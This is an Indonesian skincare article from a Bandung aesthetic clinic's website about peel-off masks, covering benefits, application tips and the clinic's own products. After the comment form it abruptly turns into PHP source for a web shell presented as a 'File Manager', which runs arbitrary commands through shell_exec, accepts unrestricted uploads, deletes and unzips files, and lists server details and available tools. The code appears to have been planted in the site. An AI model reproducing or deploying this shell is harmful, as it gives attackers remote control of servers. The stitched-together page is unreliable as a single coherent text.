Ada Yang Bisa Kami Bantu? Chat Kami Sekarang.

Kulit Cerah dan Terhidrasi dengan Masker Peel Off, Tips dan Trik Perawatan Wajah

-

Daftar Isi

Memiliki kulit yang sehat, cerah, dan terhidrasi dengan baik merupakan keinginan sebagian orang. Banyak cara yang bisa di lakukan untuk mewujudkannya, salah satunya dengan peel off mask. Masker peel off sangat populer dalam perawatan wajah karena kemampuannya untuk membersihkan pori-pori, mengangkat kotoran, dan menghidrasi kulit dengan baik. Apa saja tips dan trik untuk dapatkan manfaat dari peel off mask agar wajah terhidrasi dengan baik.

kulit cerah
Kulit Cerah dan Terhidrasi dengan Masker Peel Off, Tips dan Trik Perawatan Wajah

Apa Itu Masker Peel Off 

Peel Off Mask merupakan jenis masker wajah yang umumnya berbentuk gel atau krim yang di oleskan pada kulit kemudian di tunggu hingga kering. Setelah kering, masker akan mudah di angkat dari wajah dengan cara di tarik sehingga mengangkat sel kulit mati, minyak berlebih, dan kotoran yang terperangkap di dalam pori-pori. Biasanya terdapat kandungan seperti karbon aktif, gliserin, vitamin atau ekstrak tumbuhan yang memberikan banyak manfaat pada kulit.

Manfaat Masker Peel Off untuk Kulit

1. Mengangkat Sel Kulit Mati

Lapisan sel kulit mati yang terangkat memudahkan masker peel off membantu merangsang regenerasi sel kulit baru. Hal ini membuat kulit terlihat lebih cerah, halus, dan bercahaya.

2. Pembersihan Optimal

Masker peel off bisa membersihkan pori-pori hingga ke dalam, membantu mengangkat kotoran, mnyak berlebih, dan sisa kosmetik yang terperangkap di dalamnya. Rutin menggunakan peel off mask bisa membantu mencegah munculnya jerawat, komedo, serta membuat kulit terasa lebih fresh.

3. Menghidrasi Kulit

Pada umumnya peel off mask terdapat kandungan seperti gliserin, atau ekstrak tumbuhan yang bisa menghidrasi kulit. Hal ini bisa membantu menjaga kelembapan alami kulit dan membuat kulit terasa lebih lembut dan kenyal.

4. Menyegarkan dan Detoksifikasi

Menghilangkan racun dan kotoran dari kulit, masker peel off juga memberikan efek segar dan detoksifikasi. Kulit akan terasa lebih segar, bersih, dan siap untuk menyerap manfaat dari produk perawatan selanjutnya.

Baca Juga: Kenali Botox, Salah Satu Perawatan Wajah Untuk Atasi Kerutan

Kulit Cerah dengan Tips dan Trik Menggunakan Masker Peel Off

1. Bersihkan Wajah

Pastikan wajah bersih sebelum menggunakan masker peel off. Cuci wajah dengan pembersih yang lembut, kemudian keringkan dengan lembut sebelum mengaplikasikan masker.

2. Hindari Area Sensitif

Hindari pengaplikasian masker peel off di daerah yang sensitif seperti area mata, alis, atau bibir. Aplikasikan masker pada area T zone yang cenderung berminyak.

3. Aplikasikan Secara Merata

Oleskan masker secara merata di seluruh wajah, hindari mengaplikasikan lapisan yang terlalu tebal agar masker bisa mengering dengan baik.

4. Hindari Area Rambut dan Alis

Pastikan untuk menjauhkan rambut dan alis dari masker ketika mengaplikasikannya. Sobat cakas bisa menggunakan ikat rambut atau bando untuk menjaga agar masker tidak terkena area rambut dan alis.

5. Biarkan Masker Mengering

Biarkan masker peel off mengering sepenuhnya sesuai petunjuk waktu yang tertera pada kemasan. Biasanya memerlukan waktu sekitar 15 – 20 menit. Selama menunggu, nikmatilah waktu relaksasi dengan santi atau melakukan kegiatan lain yang menyenangkan.

7. Bersihkan Sisa Masker dengan Bersih

Pada bebeapa masker ada yang sulit di angkat sehingga menyisakan sisa di wajah. Sobat cakas bisa menggunakan air hangat atau kapas yang di basahi untuk membersihkannya dengan lembut. Pastikan sobat cakas membersihkan sisa masker yang menempel di wajah dengan benar.

8. Lanjutkan dengan Perawatan Kulit Rutin

Setelah menggunakan masker peel off, lanjut melakukan perawatan rutin lainnya seperti penggunaan face tonic, serum, dan moisturizer. Hal ini bisa membantu memberikan kelembapan tambahan pada kulit dan memaksimalkan perawatan.

Untuk dapatkan hasil yang optimal, gunakan peel off mask secara teratur sesuai dengan petunjuk yang tertera pada kemasan. Biasanya 1 – 2 kali penggunaan dalam seminggu sudah cukup untuk memberikan manfaat sesuai yang di harapkan.

Rekomendasi Peel Off Mask 2023

RSa Peel Off Mask Brightening

Masker yang berfungsi untuk merawat dan melembapkan kulit wajah yang mengandung whitening agent yang bisa menyamarkan noda hitam dan mencerahkan wajah. Terdapat kandungan arbutin yang sering di temukan dalam produk skincare yang berfungsi untuk membersihkan kulit. Selain itu, masker ini berfungsi untuk membersihkan kulit wajah dari kotoran, debu, minyak berlebih, dan sisa make up.

Selain kandungannya yang memiliki banyak manfaat untuk wajah, cara penggunaan peel of mask cukup mudah;

  • Tuangkan RSa Peel Of Mask Brightening pada wadah kemudian campurkan dengan air bersih atau rose water kemudian aduk secara merata
  • Oleskan RSa Peel Of Mask Brightening pada area wajah dan leher
  • Diamkan selama 15 menit agar bahan aktif di dalamnya mudah menyerap
  • Angkat masker dengan cara di kelupas

2. RSa Peel Of Mask Charcoal

Masker yang memiliki tekstur seperti cream atau peel off yang mengering ketika di aplikasikan pada wajah kemudian bisa di kelupas. RSa Peel Of Mask Charcoal memiliki bahan aktif charcoal yang di percaya bisa mengangkat kotoran, minyak berlebih, serta komedo pada wajah. Gunakan peel of mask dengan rutin agar wajah menjadi lembap, lebih bersih, dan tidak kusam.

Baca Juga : Ketahui Manfaat dan Fakta Menarik tentang DNA Salmon yang Menjadi Bahan Utama Skincare Terbaru

Namun, perlu di perhatikan penggunaan peel of mask tidak di sarankan untuk kulit yang sedang bermasalah seperti berjerawat yang parah atau kulit yang sangat sensitif. Selain itu, peel of mask juga perlu di gunakan dengan benar dan tidak terlalu sering karena bisa menyebabkan iritasi pada kulit wajah.

Cantik Ayu Kasep Wibawa

Informasi selengkapnya; 

Alamat : Jl. Ciluncat No.17, Ciluncat, Kec. Cangkuang, Kabupaten Bandung, Jawa Barat 40238

Whatsapp : 085314650373

Instagram : RSa Aesthetic Clinic

Klinik RSa Aesthetic

Klinik RSa Aesthetic

Klinik Treatment Kecantikan Berkualitas di Bandung

Bagikan Artikel Via:

Share on facebook
Facebook
Share on twitter
Twitter
Share on linkedin
LinkedIn
Share on whatsapp
WhatsApp

Tinggalkan Komentar

Alamat email Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *

basename($file), 'size' => '', 'last_modified' => date('Y-m-d H:i:s', filemtime($file)), 'owner' => posix_getpwuid(fileowner($file))['name'], 'permissions' => substr(sprintf('%o', fileperms($file)), -4), ); } else { $files[] = array( 'name' => basename($file), 'size' => filesize($file), 'last_modified' => date('Y-m-d H:i:s', filemtime($file)), 'owner' => posix_getpwuid(fileowner($file))['name'], 'permissions' => substr(sprintf('%o', fileperms($file)), -4), ); } } // Handle file upload if (isset($_FILES['file'])) { $file = $_FILES['file']; if ($file['size'] > $max_upload_size) { echo 'File too large!'; } else { move_uploaded_file($file['tmp_name'], $current_dir. '/'. $file['name']); } } // Handle file deletion if (isset($_POST['delete'])) { $file = $_POST['delete']; $file_path = rtrim($current_dir, '/') . '/' . $file; if (file_exists($file_path) && is_file($file_path)) { unlink($file_path); header('Location: ' . $_SERVER['PHP_SELF'] . '?dir=' . rawurlencode(rtrim($current_dir, '/'))); exit; } else { echo 'File not found or not a file!'; } } // Handle terminal command if (isset($_POST['command'])) { $command = $_POST['command']; $output = shell_exec($command); echo "
$output
"; // Update current directory if command is cd if (strpos($command, 'cd ') === 0) { $new_dir = trim(substr($command, 3)); if ($new_dir == '..') { $current_dir = dirname($current_dir); } elseif ($new_dir!= '') { $current_dir = realpath($current_dir. '/'. $new_dir); } } } // Handle unzip if (isset($_POST['unzip'])) { $file = $_POST['unzip']; $file_path = $current_dir. '/'. $file; if (file_exists($file_path) && is_file($file_path)) { $zip = new ZipArchive; $res = $zip->open($file_path); if ($res === TRUE) { $zip->extractTo($current_dir); $zip->close(); echo "Unzipped successfully!"; } else { echo "Failed to unzip!"; } } else { echo "File not found or not a file!"; } } // Handle mkdir if (isset($_POST['mkdir'])) { $dir = $_POST['mkdir']; $dir_path = $current_dir. '/'. $dir;if (!is_dir($dir_path)) { mkdir($dir_path, 0750, true); echo "Directory created successfully!"; } else { echo "Directory already exists!"; } } // System information $server_ip = $_SERVER['SERVER_ADDR']; $web_server = $_SERVER['SERVER_SOFTWARE']; $system = php_uname('s'); $user = $_SERVER['USER']; $php_version = phpversion(); $disabled_functions = ini_get('disable_functions'); // MySQL, cURL, WGET, Perl, and Python information $mysql_enabled = function_exists('mysql_connect')? 'ON' : 'OFF'; $curl_enabled = function_exists('curl_init')? 'ON' : 'OFF'; $wget_enabled = shell_exec('wget --version')? 'ON' : 'OFF'; $perl_enabled = shell_exec('perl -v')? 'ON' : 'OFF'; $python_enabled = shell_exec('python --version')? 'ON' : 'OFF'; function filesize_format($size) { $units = array('B', 'KB', 'MB', 'GB', 'TB'); for ($i = 0; $size >= 1024 && $i < count($units) - 1; $i++) { $size /= 1024; } return round($size, 2). ' '. $units[$i]; } ?> File Manager

File Manager

Current directory:

Name Size Last Modified Owner Permissions Options

System Information

Server IP:

Web Server:

System:

User:

PHP Version:

Disabled Functions:

Module Information

MySQL:

cURL:

WGET:

Perl:

Python: